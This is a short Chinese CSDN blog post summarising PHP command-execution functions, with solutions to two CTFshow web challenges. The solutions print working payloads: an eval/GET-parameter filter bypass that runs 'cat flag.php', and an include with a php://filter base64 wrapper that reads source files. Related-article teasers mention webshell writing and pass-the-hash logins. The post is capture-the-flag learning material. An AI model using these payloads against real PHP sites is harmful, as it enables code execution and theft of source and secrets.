命令执行总结

最新推荐文章于 2024-11-09 11:47:39 发布
最新推荐文章于 2024-11-09 11:47:39 发布
阅读量101 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45694932/article/details/132354865
版权 
执行外部命令的函数
system() exec() passthru()
system() 输出并返回最后一行shell结果。
exec() 不输出结果,返回最后一行shell结果,所有结果可以保存到一个返回的数组里面。
passthru() 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。
相同点:都可以获得命令执行的状态码

CTFshow web 31
在这里插入图片描述

嵌套异或逃逸:

&符号作为连接,并且。
使用GET的a作为一个参数,传给c,再给1一个赋值,这样就可以跳过对c的过滤。

payload:c=eval($_GET[a]);&a=echo exec(“cat flag.php”);

CTFshow web 32
在这里插入图片描述

嵌套include文件包含,利用伪协议文件包含。

payload:c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php<?php

filter:通过指定的通道来读取指定的文件
这里使用base64读取
不用base64读不到源文件

cop_g
关注
kafka常用操作命令总结
congge
05-21 7216
前言 在使用kafka开发和运维的时候,经常需要进行一些常用的调试操作,比如创建topic,删除topic,测试从producer发消息给consumer等,这时可以使用kafka提供的常用的命令行工具进行操作,相比可视化工具某些时候可能更有效,下面将列出常用的操作操作命令方便后续运维使用时候查找 1、kafka启动命令 服务器上安装完zookeeper并配置好kafka的环境后,进入kafka的bin目录下 可以看到,在该目录下保存了许多的以sh结尾的文件,就可以使用这些脚本文件完成对kafka的命令
Linux常用命令及实用命令万字总结.doc
07-21
* which命令:用于查找可执行文件。 5. 系统管理命令 * shutdown命令:用于关机或重启系统。 * reboot命令:用于重启系统。 * init命令:用于更改系统的运行级别。 这些命令只是Linux系统中的一部分,都是 Linux ...
CTF-命令执行部分总结
weixin_44770698的博客
05-29 1847
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
Linux常用命令总结
qq_45704528的博客
08-15 3万+
Linux常用命令总结 目录Linux常用命令总结服务器关机相关命令2.系统目录结构介绍3.文件操作相关命令4.文件的基本属性5.文件的内容查看6.Vim7.进程相关命令 服务器关机相关命令 关机指令为:shutdown ; sync # 将数据由内存同步到硬盘中。 shutdown # 关机指令,你可以man shutdown 来看一下帮助文档。例如你可以运行如下命令关机: shutdown –h 10 # 这个命令告诉大家,计算机将在10分钟后关机 shutdown –h now # 立马关机
linux后台运行命令总结
abc
08-19 6390
但万一网络不好,(比如我这儿的破校园网,高峰时几秒钟断一次),终端突然和服务器之间的连接断了,那脚本就会自动停了(因为运行test.sh进程的父进程就是当前的shell终端进程,关闭当前shell终端时,父进程退出,会发送hangup信号给所有子进程,子进程收到hangup以后也会退出)。nohup:不挂断的运行,注意并没有后台运行的功能,就是指用nohup运行命令可以使命令永久的执行下去,和用户终端没有关系,例如我们断开SSH连接都不会影响他的运行,注意了nohup没有后台运行的意思;
批量执行redis命令总结
w727655308的博客
09-07 655
redis 批量操作 批量执行命令
命令注入总结
weixin_44576725的博客
12-15 7347
文章目录命令注入总结原理常见的危险函数PHPsystemexecpassthrushell_execpopenproc_open反引号Pythonsystempopensubprocess.call/subprocess.runspawnJavajava.lang.Runtime.getRuntime().exec(command)Linux下常用的符号特殊符号通配符常用绕过命令分隔与执行多条命令空格绕过绕过 escapeshellcmd黑名单绕过无参数rce过滤字母或数字常用读取文件方式常用读取目录方式利
Docker常用命令总结
热门推荐
m0_62946761的博客
02-16 4万+
docker常用命令解释及总结,简洁明了,清晰易懂
命令执行写Webshell总结
hackzkaq的博客
07-20 5361
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 前言 当我们找到一个rce漏洞却无法反弹shell时,在web路径写webshell用连接工具进行管理会方便的多,本文总结命令执行到webshell的流程化操作。 寻找web路径 写webshell当然要写在web路径,第一步要做的就是快速寻找web路径 1.文件查找法 一般web路径一定会有index.html\php\jsp\asp,login.xxx文件。可以根据已知页面文件名全局搜索 linux: find / -name ind
命令执行汇总
qq_50613938的博客
11-03 3090
命令执行函数 eval ?@System Assert 命令执行 linux命令分号&&和&,|和||的用法。 “;”分号用法 方式:command1 ; command2 用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。 彼此不关联 “| ”管道符用法 上一条命令的输出,作为下一条命令参数。ctf里面:ping 127.0.0.1 | ls(只执行ls不执行前面的) 方式:command1 | command Lin
Linux 远程连接Windows执行命令方法总结
sojrs_sec的博客
09-20 5973
winexe winexe在kali里面自带,用于在linux平台连接windows机器 环境要求:开启文件共享,即smb服务;禁用UAC远程限制 pth-winexe -U username%password //remote_ip cmd.exe --system 支持ntlm hash直接登录 若报错 E_md4hash wrapper called. ERROR: CreateSe...
PowerShell中运行CMD命令的技巧总结(解决名称冲突和特殊字符等问题)
01-20
您可能知道新的 Windows PowerShell 可以运行任何旧命令。不过有些旧命令的名称或语法可能会产生问题。但这都不是事儿。 麻烦 1:名称冲突 PowerShell 的 cmdlet 别名和旧命令的名称有冲突是个常见的问题。比如说您...
Linux命令学习总结之rmdir命令
09-15
- `-v, --verbose`:显示命令执行的详细信息,包括删除的每个目录。 - `--help`:显示rmdir命令的帮助信息。 - `--version`:显示rmdir命令的版本信息。 **使用示例** 1. **查看帮助信息**: 要获取rmdir命令的...
CRSM命令学习总结完整[归纳].pdf
10-11
* 、和<P3>:参数,用于指定命令执行方式和参数 五、CRSM命令的响应 CRSM命令的响应包括:、和。其中:和是MT返回的状态代码,是SIM卡返回的响应数据。 六、CRSM命令的错误处理 CRSM命令的错误处理包括:CME ...
对python中执行DOS命令的3种方法总结
09-20
总结来说,Python提供了多种方式来执行DOS或Shell命令,选择哪种方法取决于具体需求。`os.system()` 简单易用,适合不需复杂控制的情况;`Popen` 提供了更多的控制选项,适合需要处理子进程输出或进行交互式操作的...
[vulnhub] DarkHole: 1
weixin_46099552的博客
11-08 624
vulnhub - DarkHole: 1
PHP-FPM 性能配置优化
陈万洲的专栏
11-05 873
FastCGI 是的简称,是一种交互程序(此处是 PHP)与 Web 服务器之间的 通信协议。FastCGI 是早期通用网关接口(CGI)的增强版本。注意 FastCGI 和 CGI 都是一种通信协议,独立于任何语言。Web 服务器无须对语言有任何了解。除 PHPphp-fpm 外,像 Python, Ruby, Perl, Tcl, C/C++, 和 Visual Basic 都有其各自的 CGI 和 FastCGI 实现。
弄巧成拙的 PFC(Priority-based Flow Control)
最新发布
Netfilter
11-09 572
InfiniBand 满足 RDMA 的需求,但复杂且昂贵,需要专用 IB 链路层支撑,而 RoCE 旨在普遍的以太网上部署 RDMA,但以太网是有损网络,会拥塞而丢包,丢包重传会增加网卡实现的复杂性同时增加时延,抵消 RDMA 的优势。不要指望网络无损,因为不丢包不可能,丢包原因又不止拥塞一种,PFC 显然无法覆盖所有场景,问题的核心应集中在丢包恢复,而拥塞控制完全从丢包解耦,拥塞不与丢包关联,自然就是另一个独立问题。即便不重构整个网络,只要从本质出发,问题的解法也会比 PFC 更高尚。
jfrog artifactory oss社区版,不支持php composer私库
天草二十六
11-05 555
安装环境:centos操作系统,root用户。如果是mac或ubuntu等操作系统的话,会有许多安装的坑等着你。一切都是徒劳,安装折腾那么久,最后还是不能使用。这就是写本文的初衷,切勿入坑就对了。
tmux命令使用技巧与总结
资源摘要信息: 该文件名为“tmux命令使用总结共7页.pdf.zip”,看似是一个压缩包文件,实际上可能包含了关于tmux命令使用的总结性文档。由于文件为压缩格式,目前无法直接查看具体内容。然而,依据文件的名称,我们...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值